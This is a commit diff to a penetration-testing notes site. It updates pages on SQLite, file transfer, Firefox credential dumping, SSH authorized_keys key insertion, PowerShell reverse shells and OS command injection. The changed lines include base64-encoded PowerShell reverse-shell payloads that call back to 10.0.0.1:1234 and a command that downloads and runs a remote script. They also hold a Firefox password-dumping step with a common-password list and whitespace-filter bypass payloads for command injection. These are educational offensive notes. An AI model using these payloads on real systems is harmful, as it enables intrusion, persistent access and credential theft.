updated techniques

Author: hdks-bug

LICENSE

@@ -1,4 +1,4 @@
-Copyright (c) 2022 Hideki Ishiguro
+Copyright (c) 2022 hdks
 
 Permission is hereby granted, free of charge, to any person obtaining
 a copy of this software and associated documentation files (the

src/exploit/database/sqlite-pentesting.md

@@ -4,15 +4,15 @@ description: SQLite is a database engine.
 tags:
     - Database
 refs:
-date: 2023-03-11
+date: 2024-10-03
 draft: false
 ---
 
 ## Interpreter
 
 ```sh
 sqlite3 sample.db
-# or
+sqlite3 sample.sqlite
 sqlitebrowser sample.db
 ```
 
@@ -31,13 +31,15 @@ sqlite> .databases
 sqlite> .tables
 
 # Show table information
-sqlite> pragma table_info(table_name);
+sqlite> PRAGMA table_info(table_name);
 
 # Dump contents of tables
 sqlite> .dump <table>
 
-# SQL commands
-sqlite> select * from <table>;
+# SQL commands to display values in the table
+sqlite> SELECT * FROM <table>;
+# Display values in Hex
+sqlite> SELECT HEX(column_name) FROM <table>;
 
 # Exit the interpreter
 sqlite> .quit

src/exploit/linux/management/file-transfer-in-linux.md

@@ -4,7 +4,7 @@ description:
 tags:
     - Linux
 refs:
-date: 2023-11-11
+date: 2024-10-03
 draft: false
 ---
 
@@ -22,13 +22,14 @@ python -m http.server --directory /usr/bin
 In machine B, download a file from the web server of machine A.
 
 ```sh
-wget http://<ip-for-machine-A>:8000/example.txt
+wget http://<ip>:8000/example.txt
 
 # Download recursively
-# -r: recursive
-# -np: no parent
-# Don't forget "/" after the directory name
-wget -r -np http://<ip-for-machine-A>/somedir/
+# -r: Recursive
+# -np: No parent
+# --reject="index.html*": Not save index.html
+# -P: output directory
+wget http://<ip>/example_dir -r -np -nH --cut-dirs=1 --reject="index.html*" -P example_dir
 ```
 
 <br />

src/exploit/linux/privilege-escalation/firefox-credentials-dumping.md

@@ -0,0 +1,37 @@
+---
+title: FireFox Credentials Dumping
+description: A .mofilla directory contains a firefox directory that stores credentials. We may dump the credentials and escalate privilege using them.
+tags:
+    - Privilege Escalation
+refs:
+date: 2024-10-03
+draft: false
+---
+
+## Investigation
+
+If there is a `.mozilla/firefox` directory in some user's home directory, we can dump credentials. So check this directory:
+
+```sh
+ls -al /home/<user>/.mozilla/
+```
+
+<br />
+
+## Dump Passwords from Firefox Profile
+
+To crack it, use [firefox_decrypt](https://github.com/unode/firefox_decrypt):
+
+```sh
+python3 firefox_decrypt.py .mozilla/firefox/<id>
+```
+
+If we’ll be asked the master password and we don’t know it, try common passwords.
+
+```txt
+admin
+password
+password1
+password123
+root
+```

src/exploit/linux/privilege-escalation/index.md

@@ -6,7 +6,7 @@ tags:
     - Remote Code Execution
 refs:
     - https://book.hacktricks.xyz/linux-hardening/privilege-escalation
-date: 2024-07-17
+date: 2024-10-03
 draft: false
 ---
 
@@ -348,6 +348,33 @@ ls /proc/bus/pci
 
 <br />
 
+## SSH Public Key Forgery
+
+If we have write permission to `.ssh/authorized_keys`, we can insert our SSH public key to this file and login as the user.  
+
+In local machine, generate SSH private/public keys as below:
+
+```sh
+ssh-keygen -f key
+cat key.pub
+# Copy the output!
+```
+
+In target machine, paste the content of the public key to `.ssh/authorized_keys`:
+
+```sh
+echo '<PUBKEY_CONTENT>' >> .ssh/authorized_keys
+```
+
+In local machine, we can login using the private key:
+
+```sh
+chmod 600 key
+ssh user@<target-ip> -i key
+```
+
+<br />
+
 ## Open Ports
 
 ```sh
@@ -434,15 +461,12 @@ pidof /bin/bash
 pidof python3
 
 lsof
-sudo lsof
-# -l: List UID numbers
-lsof -l
-sudo lsof -l
-# -i: Select by IPv[46] address
-lsof -i :80
-sudo lsof -i :80
-lsof -i :443
-sudo lsof -i :443
+# -p: PID
+lsof -p 1234
+# -i: Display the information of network connections.
+# -n: Not resolve IP addresses.
+# -P: Display port numbers.
+lsof -i -n -P
 ```
 
 ### Using PSPY

src/exploit/linux/privilege-escalation/mozilla-pentsting.md

@@ -8,7 +8,7 @@ tags:
 refs:
     - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
     - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
-date: 2024-09-10
+date: 2024-10-03
 draft: false
 ---
 
@@ -135,11 +135,9 @@ powershell Invoke-Expression (New-Object Net.WebClient).DownloadString('http://e
 
 powershell -c "Invoke-Expression (Invoke-WebRequest -usebasicparsing http://10.0.0.1:8000/revshell.ps1)"
 
-# Base64 encoded payload
-powershell -e JGNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5Tb2NrZXRzLlRDUENsaWVudCgnMTAuMC4wLjEnLDEyMzQpOyRzdHJlYW0gPSAkY2xpZW50LkdldFN0cmVhbSgpO1tieXRlW11dJGJ5dGVzID0gMC4uNjU1MzV8JXswfTt3aGlsZSgoJGkgPSAkc3RyZWFtLlJlYWQoJGJ5dGVzLCAwLCAkYnl0ZXMuTGVuZ3RoKSkgLW5lIDApezskZGF0YSA9IChOZXctT2JqZWN0IC1UeXBlTmFtZSBTeXN0ZW0uVGV4dC5BU0NJSUVuY29kaW5nKS5HZXRTdHJpbmcoJGJ5dGVzLDAsICRpKTskc2VuZGJhY2sgPSAoaWV4ICRkYXRhIDI+JjEgfCBPdXQtU3RyaW5nICk7JHNlbmRiYWNrMiA9ICRzZW5kYmFjayArICdQUyAnICsgKHB3ZCkuUGF0aCArICc+ICc7JHNlbmRieXRlID0gKFt0ZXh0LmVuY29kaW5nXTo6QVNDSUkpLkdldEJ5dGVzKCRzZW5kYmFjazIpOyRzdHJlYW0uV3JpdGUoJHNlbmRieXRlLDAsJHNlbmRieXRlLkxlbmd0aCk7JHN0cmVhbS5GbHVzaCgpfTskY2xpZW50LkNsb3NlKCk=
-
-# Base64 encoded payload (contains null character between each character)
-powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQAwAC4AMAAxACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
+# Base64-encode (UTF-16LE).
+# Use CyberChef: "Encode text (UTF-16LE)" -> "To Base64"
+powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMAAuADAALgAxACcALAAxADIAMwA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAnAFAAUwAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
 ```
 
 ### Bypass AV (Antivirus)

src/exploit/shell/reverse-shell-cheat-sheet.md

@@ -4,7 +4,7 @@ description: Basic methodologies of web penetration tests. A default port is 80.
 tags:
     - Web
 refs:
-date: 2024-02-13
+date: 2024-10-03
 draft: false
 ---
 
@@ -143,12 +143,9 @@ Now access to the website again. We might be able to see the contents of the web
 
 <br />
 
-## Find Information in Web Pages
+## Check Comments in HTML Source
 
-```sh
-curl http://vulnerable.com/ | grep -i hidden
-curl http://vulnerable.com/ | grep -i password
-```
+There may be comments in the HTML source code that provide hints for exploitation.
 
 <br />
 

src/exploit/web/method/web-basic-pentesting.md

@@ -1,15 +1,28 @@
 ---
 title: OS Command Injection
-description: 
+description: We can inject OS commands through URL params, POST data, etc.
 tags:
     - Remote Code Execution
     - Reverse Shell
     - Web
 refs:
-date: 2023-11-11
+date: 2024-10-03
 draft: false
 ---
 
+## Automation
+
+- [commix](https://github.com/commixproject/commix)
+
+    ```bash
+    commix.py -u https://example.com/?name=test
+    commix.py -u https://example.com/ --method=POST -d "name=test"
+    ```
+
+*Use `--batch` option for default behavior without user input.
+
+<br />
+
 ## Basic Payloads
 
 If the payload includes whitespaces (**' '**), we need to change it to **'+'** or **URL encoding ('%20')**.
@@ -74,17 +87,22 @@ We may be able to bypass specific character filter by encoding them.
 
 Reference: [https://www.ctfnote.com/web/os-command-injection/whitespace-bypass](https://www.ctfnote.com/web/os-command-injection/whitespace-bypass)
 
-If the website filters whitespaces and we cannot inject OS command including spaces e.g. **'sleep 5'**, we can insert **Internal Field Separator (IFS)** as whitespace.
+If the website filters whitespaces and we cannot inject OS command including spaces e.g. **'sleep 5'**, we can insert **Internal Field Separator (IFS)** as whitespace:
 
 ```bash
 $IFS$9
+# or
+${IFS}
 ```
 
 ### Payload Examples:
 
+Below is the `ping -c 1 10.0.0.1` command:
+
 ```html
-<!-- ping -c 5 10.0.0.1 -->
-/?cmd=ping$IFS$9-c$IFS$9510.0.0.1
+/?cmd=ping$IFS$9-c$IFS$91$IFS$910.0.0.1
+<!-- or -->
+/?cmd=ping${IFS}-c${IFS}1${IFS}10.0.0.1
 ```
 
 <br />

src/exploit/web/security-risk/os-command-injection.md

@@ -4,17 +4,18 @@ description:
 tags:
     - Web
 ref:
-date: 2024-04-13
+date: 2024-10-03
 draft: false
 ---
 
 ## Automation
 
-[Tplmap](https://github.com/epinna/tplmap) is a program for Server-Side Template Injection and Code Injection.
+- [SSTImap](https://github.com/vladko312/SSTImap)
 
-```sh
-./tplmap.py -u http://vulnerable.com/?name=test
-```
+    ```sh
+    ./sstimap.py -u https://example.com/?name=test
+    ./sstimap.py -u https://example.com -m POST -d "name=test"
+    ```
 
 <br />